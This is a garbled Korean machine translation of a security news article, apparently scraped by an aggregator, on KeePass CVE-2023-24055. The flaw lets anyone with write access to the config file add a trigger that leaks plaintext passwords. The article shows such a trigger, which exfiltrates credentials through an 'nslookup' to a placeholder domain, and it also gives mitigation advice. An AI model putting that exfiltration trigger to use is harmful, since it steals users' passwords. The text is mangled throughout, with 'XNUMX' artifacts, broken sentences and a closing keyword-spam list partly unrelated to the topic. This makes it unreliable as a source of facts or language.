사용하는 모든 웹사이트에 대해 다른 암호를 생성하고 모든 암호를 추적하는 데 도움이 되는 편리한 유틸리티인 암호 관리자에 대해 뉴스 가치가 있는 몇 주가 지났습니다.
2022년 말, 회사가 마침내 2022년 XNUMX월에 겪은 위반이 실제로 고객의 비밀번호로 끝났다는 것을 인정했을 때 LastPass가 온통 뉴스에 등장할 차례였습니다. 도난당하는 금고 백업된 클라우드 서비스에서
(비밀번호 자체는 도난당하지 않았습니다. 금고가 암호화되었기 때문이고 LastPass에는 백업 금고 파일 자체에 대한 "마스터 키" 사본이 없었지만 대부분의 사람들이 듣고 기뻐하는 것보다 훨씬 나은 수준이었습니다.)
그런 다음 회사가 발진처럼 보이는 것에 대해 경고했을 때 LifeLock이 뉴스 전체에 퍼질 차례였습니다. 암호 추측 공격, 아마도 얼마 전에 완전히 다른 웹사이트에서 도난당한 암호를 기반으로 하며 아마도 최근에 다크 웹에서 구입했을 것입니다.
LifeLock 자체는 침해되지 않았지만 일부 사용자는 자신이 취한 기억조차 없는 위험으로 인한 암호 공유 행위 덕분에 침해당했습니다.
경쟁사인 1Password와 BitWarden도 최근 구글이 의도치 않게 방송한 것으로 보이는 악의적인 광고에 대한 보고를 기반으로 뉴스에 등장했습니다. 이 광고는 사용자가 자신의 계정 세부 정보를 피싱할 목적으로 로그온 페이지를 복제하도록 설득력 있게 유인했습니다.
이제 KeePass가 될 차례입니다. 뉴스에서, 이번에는 또 다른 사이버 보안 문제: 취약점, 공격자가 악의적인 목적으로 악용할 수 있는 사이버 보안 구멍으로 이어지는 소프트웨어 버그에 사용되는 전문 용어입니다.
암호 스니핑이 쉬워졌습니다.
우리는 그것을 다음과 같이 언급하고 있습니다. 취약점 여기에는 US National Institute for Standards and Technology에서 발행한 공식 버그 식별자가 있기 때문입니다.
버그가 더빙되었습니다 CVE-2023-24055: XML 구성 파일에 대한 쓰기 액세스 권한이 있는 공격자는 내보내기 트리거를 추가하여 일반 텍스트 암호를 얻을 수 있습니다.
불행하게도 일반 텍스트 암호를 얻을 수 있다는 주장은 사실입니다.
소위 귀하의 개인 파일에 대한 쓰기 액세스 권한이 있는 경우 %APPDATA%
이미 사용자 정의한 KeePass 설정을 수정하거나 고의로 아무것도 변경하지 않은 경우 사용자 정의를 추가하기 위해 구성 섹션을 몰래 조정할 수 있습니다…
...예를 들어 전체 데이터베이스를 암호화되지 않은 CSV 파일로 덤프하는 것과 같이 대량으로 또는 예를 들어 액세스할 때마다 트리거되는 "프로그램 후크"를 설정하는 것과 같이 암호를 사용할 때 놀라울 정도로 쉽게 일반 텍스트 암호를 훔칠 수 있습니다. 데이터베이스에서 암호.
필요없다는 점 참고하세요 관리자 권한, KeePass 앱이 저장되는 실제 설치 디렉토리를 망칠 필요가 없기 때문에 일반적으로 일반 사용자에게는 제한이 없습니다.
그리고 잠긴 전역 구성 설정에 액세스할 필요가 없습니다.
흥미롭게도 KeePass는 이미 시스템 관리자 권한이 있는 사용자의 다양한 키로거 방지 트릭을 중지하기 위해 변조 방지 기술을 사용하는 것을 포함하여 암호를 사용할 때 암호가 스니핑되는 것을 방지하기 위해 노력합니다.
그러나 KeePass 소프트웨어를 사용하면 관리자가 아닌 경우에도 "너무 쉽다"고 생각할 수 있는 방식으로 일반 텍스트 암호 데이터를 놀라울 정도로 쉽게 캡처할 수 있습니다.
KeePass GUI를 사용하여 트리거 암호를 클립보드에 복사할 때마다 실행하고 문제의 사용자 이름과 일반 텍스트 암호를 모두 포함하는 DNS 조회를 수행하도록 해당 이벤트를 설정하는 이벤트:
그런 다음 자체 로컬 구성 파일에서 해당 옵션에 대한 분명하지 않은 XML 설정을 시스템의 다른 사용자의 구성 파일로 복사할 수 있습니다. 그 후에는 DNS 조회를 통해 인터넷을 통해 비밀번호가 유출되는 것을 발견할 수 있습니다.
XML 구성 데이터는 대체로 읽기 쉽고 유익하지만 KeePass는 이상하게도 GUID라고 하는 임의의 데이터 문자열을 사용합니다. 전역 고유 식별자) 다양한 것을 나타내기 위해 트리거 따라서 잘 알고 있는 사용자라도 어떤 트리거가 어떻게 설정되었는지 이해하기 위해 광범위한 참조 목록이 필요합니다.
다음은 DNS 유출 트리거의 모습입니다. 일부 세부 정보를 수정했지만 이 텍스트를 직접 복사하여 붙여넣는 것만으로는 즉각적인 문제가 발생하지 않도록 했습니다.
XXXXXXXXXXXXXXXXXXXXX 복사 DNS 조회를 통해 물건을 훔치다 XXXXXXXXXXXXXXXXXXXXX 0XXXXXXXXXXXXXXXXXXXXX nslookup XXXXX.XXXXX.blah.test 진실 1
이 트리거가 활성화된 상태에서 KeePass 암호에 액세스하면 내가 선택한 도메인에 대한 눈에 띄지 않는 DNS 조회에서 일반 텍스트가 누출됩니다. blah.test
이 예제에서.
실제 공격자는 훔친 텍스트를 뒤섞거나 난독화할 것이 거의 확실합니다. 이렇게 하면 DNS 유출이 발생했을 때 발견하기 어려울 뿐만 아니라 악센트 부호가 있는 문자나 이모지와 같은 비ASCII 문자가 포함된 비밀번호도 주의해야 합니다. 그렇지 않으면 DNS 이름에 사용할 수 없습니다.
하지만 정말 버그일까요?
그러나 까다로운 질문은, "이것은 정말 버그입니까, 아니면 이미 개인 파일에 대한 제어 권한이 귀하만큼 필요한 사람이 남용할 수 있는 강력한 기능입니까?"
간단히 말해서, 이미 귀하의 계정을 제어하는 누군가가 귀하의 계정이 액세스할 수 있어야 하는 파일을 망칠 수 있다면 그것은 취약점입니까?
이러한 종류의 버그/기능이 남용되는 것을 더 어렵게 하기 위해 pssword 관리자가 많은 추가 변조 방지 계층을 포함하기를 희망할 수도 있지만, CVE-2023-24055 정말 CVE에 등록된 취약점입니까?
그렇다면 다음과 같은 명령을 내리지 않을 것입니다. DEL
(파일 삭제) 및 FORMAT
"버그"도 필요합니까?
그리고 잠재적으로 위험한 동작을 훨씬 쉽게 유발하는 PowerShell의 존재 자체가 없을 것입니다(시도 powerhsell get-clipboard
, 예를 들어) 자체적으로 취약점이 있습니까?
이것이 KeePass의 입장이며, 다음 텍스트가 추가되었습니다. "버그" 세부 정보 NIST 웹사이트:
** 논쟁 ** […] 참고: 공급업체의 입장은 암호 데이터베이스가 로컬 PC에 대한 해당 수준의 액세스 권한을 가진 공격자에 대해 보안을 제공하지 않는다는 것입니다.
무엇을해야 하는가?
독립형 KeePass 사용자인 경우 KeePass 앱을 열고 도구 > 방아쇠… 창 :
전체를 돌릴 수 있습니다. 트리거 이 창에서 시스템을 끄십시오. [ ] Enable trigger system
옵션…
…그러나 이것은 전역 설정이 아니므로 로컬 구성 파일을 통해 다시 켤 수 있으므로 계정에 대한 액세스 권한이 있는 공격자가 아니라 실수로부터만 사용자를 보호합니다.
전역 "잠금" 파일을 수정하여 컴퓨터의 모든 사람에 대해 옵션을 강제로 해제할 수 있습니다. 스스로 다시 켤 수 있는 옵션은 없습니다. KeePass.config.enforced.XML
, 앱 프로그램 자체가 설치된 디렉토리에서 찾을 수 있습니다.
전역 XML 적용 파일이 다음과 같은 경우 모든 사람에 대해 트리거가 강제로 해제됩니다.
거짓
(궁금하신 경우, 이 변경 사항을 되돌리기 위해 응용 프로그램 디렉토리에 대한 쓰기 액세스 권한이 있는 공격자는 KeePass 실행 파일 자체를 수정하거나 어쨌든 독립 실행형 키로거를 설치하고 활성화할 수 있는 충분한 시스템 수준의 권한을 거의 확실히 가지고 있을 것입니다.)
사용자의 컴퓨터에서 KeePass를 잠그는 작업을 맡은 네트워크 관리자라면 사용자를 도울 수 있을 만큼 유연하지만 실수로 사이버 범죄자를 도울 수 있을 만큼 유연하지 않은 경우 KeePass를 자세히 읽어볼 것을 권장합니다. 보안 문제 페이지 트리거 페이지 및 강제 구성 페이지.
- SEO 기반 콘텐츠 및 PR 배포. 오늘 증폭하십시오.
- 플라토 블록체인. Web3 메타버스 인텔리전스. 지식 증폭. 여기에서 액세스하십시오.
- 출처: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/
- 1
- 2022
- 70
- a
- 할 수 있는
- 소개
- 위의
- 절대
- ACCESS
- 액세스
- 계정
- 활동적인
- 추가
- 인정 된
- 광고
- 후
- 반대
- All
- 주장 된
- 이미
- 및
- 다른
- 앱
- 어플리케이션
- 8월
- 저자
- 자동
- 뒤로
- 뒷받침 된
- 배경 이미지
- 백업
- 기반으로
- 때문에
- 존재
- 경계
- 바닥
- 위반
- 곤충
- 버그
- 포착
- 한
- 케이스
- 발생
- 원인
- 센터
- 확실히
- 이전 단계로 돌아가기
- 문자
- 검사
- 선택
- 청구
- 자세히
- 클라우드
- 색
- 왔다
- 회사
- 완전히
- 컴퓨터
- 컴퓨터
- 조건
- 구성
- 고려
- 제어
- 사본들
- 수
- 엄호
- 만들
- 만든
- CVE
- 사이버 범죄자
- 사이버 보안
- 위험한
- 어두운
- 어두운 웹
- 데이터
- 데이터베이스
- 세부설명
- DID
- 다른
- 직접
- 디스플레이
- DNS
- 도메인
- 말라
- 아래 (down)
- 더빙 된
- 쉽게
- 용이하게
- 중
- 암호화
- 시행
- 충분히
- 전체의
- 조차
- 이벤트
- 모든
- 사람
- 예
- 공적
- 수출
- 광대 한
- 여분의
- 특색
- 를
- 입양 부모로서의 귀하의 적합성을 결정하기 위해 미국 이민국에
- 파일
- 최종적으로
- Find
- 융통성있는
- 수행원
- 힘
- 발견
- 에
- 얻을
- 점점
- 글로벌
- 간다
- 구글
- 능숙한
- 행복한
- 데
- 신장
- 도움
- 여기에서 지금 확인해 보세요.
- 구멍
- 기대
- 가져가
- 방법
- 그러나
- HTML
- HTTPS
- 식별자
- 즉시
- in
- 포함
- 포함
- 포함
- 유익한 정보
- 설치
- 예
- 학회
- 인터넷
- 발행물
- 발행
- IT
- 그 자체
- 특수 용어
- 유지
- 알려진
- 크게
- 제작 : LastPass
- 레이어
- 리드
- 누출
- 누수
- 레벨
- 명부
- 지방의
- 보고
- 봐라.
- 조회
- 만든
- 확인
- 제작
- 매니저
- 관리자
- 한계
- 최대 폭
- 수도
- 잘못
- 실수
- 수정
- 가장
- 이름
- 국가의
- 필요
- 네트워크
- news
- nist
- 표준
- 획득
- 공무원
- 열기
- 선택권
- 그렇지 않으면
- 자신의
- 매개 변수
- 비밀번호
- 암호
- 폴
- PC
- 사람들
- 혹시
- 확인
- 피싱
- 평문
- 플라톤
- 플라톤 데이터 인텔리전스
- 플라토데이터
- 위치
- 게시물
- 잠재적으로
- 힘
- 강한
- 권력
- PowerShell을
- 사설
- 권한
- 아마
- 프로그램
- 구매 한
- 목적
- 놓다
- 문제
- 닥치는대로의
- 발진
- 읽기
- 최근에
- 권하다
- 정규병
- 기억
- 대답
- 보고
- 보고서
- 역
- 위험
- 달리기
- 섹션
- 안전해야합니다.
- 감각
- 서비스
- 세트
- 설정
- 설정
- 짧은
- 영상을
- 간단히
- So
- 소프트웨어
- 고체
- 일부
- 어떤 사람
- Spot
- 독립
- 기준
- 아직도
- 훔친
- 중지
- 저장
- 이러한
- 가정
- SVG
- 체계
- 받아
- 기법
- Technology
- XNUMXD덴탈의
- 그들의
- 그들 자신
- 따라서
- 을 통하여
- 시간
- 에
- 너무
- 상단
- 선로
- 전이
- 투명한
- 트리거
- 참된
- 회전
- 돌린
- 일반적으로
- 유일한
- URL
- us
- 사용
- 사용자
- 사용자
- 유용
- 여러
- 둥근 천장
- 둥근 천장
- 를 통해
- 취약점
- W3
- 방법
- 웹
- 웹 사이트
- 주
- 뭐
- 어느
- 누구
- 의지
- 궁금해하는
- 작업
- 겠지
- 쓰다
- XML
- 너의
- 당신 자신
- 제퍼 넷